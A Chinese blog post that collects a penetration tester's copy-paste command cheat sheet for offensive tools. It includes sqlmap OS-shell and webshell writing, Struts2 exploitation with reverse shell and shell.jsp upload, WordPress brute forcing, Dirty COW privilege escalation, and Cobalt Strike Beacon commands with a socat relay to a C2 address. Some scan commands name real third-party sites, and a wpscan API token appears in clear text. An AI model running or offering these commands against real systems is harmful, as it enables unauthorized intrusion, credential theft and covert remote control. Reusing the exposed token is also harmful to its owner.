zoukankan      html  css  js  c++  java
  • 各种渗透小工具常用命令参数总结

    渗透过程中用到很多小工具:有的时候指令参数感觉比较难记,去搜还比较费时间,所以想了一个小办法提高效率,把常用的参数本地记下来,时不时看一看,或者用的时候直接修改贴上去就行,如下:(本机环境python默认为python3,python2为python2)

    sqlmap    
    	常用指令:
    		--identify-waf  sqlmap安全狗试探
    		--technique  B E U S T
    		--random-agent --dbs   --delay 2 -v 3 --risk 3  --batch  
    		–os-pwn 联动MSF反弹shell   
    		sqlmap -d "mssql://uset:password@ip:port/dbname" --os-shell  外连数据库操作命令
    		--os-shell  写入webshell或者命令shell 默认会有一个命令文件和上传文件
    		python sqlmap.py -u "hid=1" --file-dest="E://php///phpinfo.php写入目标路径" --file-write="E:/WWW//phpinfo.php本地shell路径"  写之前先看dba --privileges
    	绕过防护:--tamper
    		WTS:and换成&& symboliclogical.py  
    		
    sublist3r   目录爆破 python2.7  python3.4   
    		python2 sublist3r.py -b -v -d  lzu.edu.cn -p 80,443   -t 50 -o lzu.txt
    OneForAll  子域名收集  py3.7    
    		oneforall模块:
    		python oneforall.py --target 1.txt --format=txt  --brute=true run
    dirmap 
    		单目标  python dirmap.py -i https://target.com -lcf       python dirmap.py -i 192.168.1.1 -lcf
    		子网    python dirmap.py -i 192.168.1.0/24 -lcf    python dirmap.py -i 192.168.1.1-192.168.1.100 -lcf
    		文件读取  python dirmap.py -iF targets.txt -lcf  
    		
    Arjun   请求参数fuzz工具:一般参数fuzz可以从JS中找到  py3
        单个URL:python arjun.py -u https://api.example.com/endpoint --get     或者--post     -t 22 多线程  -d 2延迟
        多个URL:python arjun.py --urls targets.txt --get            --include '{"api_key":"xxxxx"}'API密钥
    	对HTTP参数进行fuzz  py>3.4  -t 20 设置线程  --headers  加请求头
    	python arjun.py -u https://api.example.com/endpoint --get/--post  不同请求
    	python arjun.py -u https://api.example.com/endpoint --get -d 2    延搁请求发送时间
    	python arjun.py -u https://api.example.com/endpoint --get --include 'api_key=xxxxx'  引入固定数据
    	
    nmap  
    	常用命令:
    		nmap -sS -iL sub_domain.txt -oX school.xml   批量扫描后输出
    		nmap -p 25 --script smtp-enum-users.nse 202.38.193.203   25端口 邮箱枚举
    		
    wpscan    https://wpvulndb.com/users/edit    --force | -f   不检查网站运行的是不是`WordPress`
    		wpscan --url https://wp.tutorabc.com/ -e --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I    #-e简单进行整体快速扫描
    		wpscan --url http://10.10.10.10 --enumerate vp --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I   简单扫描WP插件
    		wpscan --url https://intro.vipjr.com --enumerate ap --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I  完整扫描WP插件
    		wpscan --url http://10.10.10.10  --enumerate u 枚举WP用户名
    		wpsan --url http://10.10.10.10 --enumerate vt  扫描所使用的主题和漏洞
    		wpscan -u https://www.xxxxxx.wiki/ -enumerate tt    TimThumbs文件漏洞扫描
    		wpscan --url http://10.10.10.128/wordpress -P /root/Desktop/xray/rockyou.txt -U admin -t 100 #指定用户名为admin,密码为 /root/Desktop/xray/rockyou.txt 字典文件中的数据 设置线程100
    
    xray  
    xray.exe  webscan --listen 127.0.0.1:1111 --html-output awvs.html  联动
    xray.exe  webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler.html   爬虫自动挖
    
    Crawlergo   targets.txt 里面的地址放http://testphp.vulnweb.com/这个格式
    python launcher_new.py
    
    Struts2-Scan: py3
    	python Struts2Scan.py --info  查看信息
    	python Struts2Scan.py -u http://192.168.100.8:8080/index.action   单个检测
    	python Struts2Scan.py -f urls.txt   批量检测
    	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --exec   指定漏洞 命令执行
    	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --reverse 192.168.100.8:8888  反弹shell
    	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --webpath  获取web路径
    	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp  上传shell
    	
    WebCrack.py  py3 后台爆破 不支持验证码  爆破结果:web_crack_ok.txt
    	python WebCrack.py  
    	输入文件名则进行批量爆破,输入URL则进行单域名爆破
    		
    Docker  docker version	docker info	docker --help
    	镜像命令
    		docker images 查看所有镜像
    		docker search “tomcat”    或从http://hub.docker.com查
    		docker pull tomcat   下载镜像
    		docker rmi tomcat    删除镜像
    	容器命令
    		docker run -it --tomcat 运行
    		docker run -p 8080:8080 镜像名   端口映射执行
    		docker ps -a   列出正在运行的容器
    		docker ps -aq  列出正在运行的容器ID  
    		exit 容器停止并退出
    		docker start 容器ID 启动容器
    		docker restart 容器ID 重启容器
    		docker stop 容器ID 停止容器
    		docker stop $(docker ps -aq)   停止所有容器
    		docker attach 容器ID     直接进入容器启动命令的终端,不会启动新的进程
    		docker cp mycontainer:/opt/file.txt /opt/local/    复制文件
    		docker-compose down        环境移除
    		docker image prune -f -a   删除所有暂时不使用的镜像
    		docker container prune -f  删除所有停止的镜像
    		docker-compose run --rm -p 8080:80 web  docker容器端口映射
    		docker network prune   不被docker使用的network都将被清理掉
    		   
    	docker exec -ti name /bin/bash   进入docker容器查看	
    	杀死占用端口命令:
    	kill -9 $(lsof -i tcp:进程号 -t)
    	sudo kill -s 9 $(lsof -i:端口号 -t)
    	docker ps |awk '{print($1)}' |xargs -n 1 docker stop   		
    
    脏牛提权:dirty.c  大于2.6.22版本(Linux bogon)
    		查看版本:uname -a
    		编译:gcc -pthread dirty.c -o dirty -lcrypt
    		执行: ./dirty  低权限用户名
    kali搜索版本漏洞:searchsploit  ubuntu 16
    
    
    CS4.0
    传输器 传输体
    监听器(Beacon Foreign )Beacon是CS的Payload
    Beacon有两种通信模式。(异步通信模式/交互式通信模式)
    Beacon的类型(HTTP 和 HTTPS Beacon/DNS Beacon/SMB Beacon)
    重定向器(目标靶机 <-------->多个并列的重定向器<------>CS服务器)
    socat TCP4-LISTEN:9999,fork TCP4:158.247.199.169:9999  socat转发流量到CS服务器
    
    Beacon 命令
    help 			查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样,eg: help checkin
    note 			给当前目录机器起个名字, eg: note beacon-shell
    cd			在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用'/' eg: cd c:\
    mkdir 			新建目录, eg: mkdir d:\beacon
    rm 			删除文件或目录, eg: rm d:\beacon
    upload 			上传文件到目标系统中
    download		从目标系统下载指定文件,eg: download C:\Users\win7cn\Desktop\putty.exe
    cancel			取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下
    shell			在目标系统中执行指定的cmd命令, eg: shell whoami
    getuid 			查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权
    pwd			查看当前在目录系统中的路径
    ls			列出当前目录下的所有文件和目录
    drives			列表出目标系统的所有分区[win中叫盘符]
    ps			查看目标系统当前的所有的进程列表
    kill			杀掉指定进程, eg: kill 4653
    sleep 10		指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可
    jobs			列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除
    jobkill			如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, eg: jobkill 1345
    clear			清除beacon内部的任务队列
    checkin			强制让被控端回连一次
    exit 			终止当前beacon 会话
    ctrl + k 		清屏
    checkin         激活beacon 使其回连
    help mode       查看传输模式
    mode dns        传输模式-dns(每次传输4比特数据)
    mode dns-txt    切换传输模式-dns-txt(每次传输189比特数据)
    
    	
    WeblogicScan  python3
    python WeblogicScan.py -u 127.0.0.1 -p 7001  单点
    python WeblogicScan.py -f target.txt 批量  txt格式127.0.0.1:7001  或127.0.0.1 或127.0.0.1:700
    
    
    命令行终端下载:
    wget -b http://www.sample-videos.com/video/mp4/big.mp4  隐藏下载
    curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4  下载重命名
    python:
    #!python
    #!/usr/bin/python
    import urllib2
    u = urllib2.urlopen('http://domain/file')
    localFile = open('local_file', 'w')
    localFile.write(u.read())
    localFile.close()
    Netcat 
    cat file | nc -l 1234    攻击机将文件放到1234端口  
    nc host_ip 1234 > file   目标机连接该端口就会接收到
    powershell:
    $p = New-Object System.Net.WebClient
    $p.DownloadFile("http://domain/file" "C:\%homepath%file")
    
    http://xl.bhcy.cn/addme.asp
    
    
    python atlas.py --url http://eci-2zedsrkf2aml8sk5i8w3.cloudeci1.ichunqiu.com/?id=%%1%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
    
    
    Nginx 配置
    	sudo systemctl stop nginx  
    	systemctl start nginx
    	systemctl restart nginx
    	systemctl reload nginx   一些配置更改后,重新加载Nginx服务
    	systemctl disable nginx  禁止Nginx服务在服务器启动时启动
    
    
    netstat -tulnp | grep ":53"             看端口是否被占用
    netstat -ntlp                           查看端口使用情况
    service iptables status  	
    iptables -A INPUT -ptcp --dport  53  -j ACCEPT   开端口
    

      持续更新,算个小分享和学习方法分享吧

  • 相关阅读:
    循环
    pl/sql小结
    poi编程
    Activiti工作流面试相关知识!
    工作流学习——Activiti流程变量五步曲
    工作流学习——Activiti流程实例、任务管理四步曲
    工作流学习——Activiti流程定义管理三步曲
    工作流学习——Activiti整体认识二步曲
    工作流学习——重要概念扫盲篇一步曲
    Activiti工作流数据库表详细介绍(23张表)
  • 原文地址:https://www.cnblogs.com/Qiuzhiyu/p/13729512.html
Copyright © 2011-2022 走看看